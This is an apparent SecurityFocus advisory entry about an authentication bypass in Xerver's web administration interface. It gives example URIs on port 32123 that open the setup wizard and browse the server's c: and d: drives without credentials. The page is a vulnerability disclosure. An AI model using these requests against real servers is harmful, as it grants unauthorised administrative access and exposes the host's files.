Xerver Web Administration Authentication Bypass Vulnerability

Attackers can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com:32123/?action=wizardStep1
http://www.example.com:32123/action=chooseDirectory&currentPath=d:%5C
http://www.example.com:32123/action=chooseDirectory&currentPath=c:\


 

Privacy Statement
Copyright 2010, SecurityFocus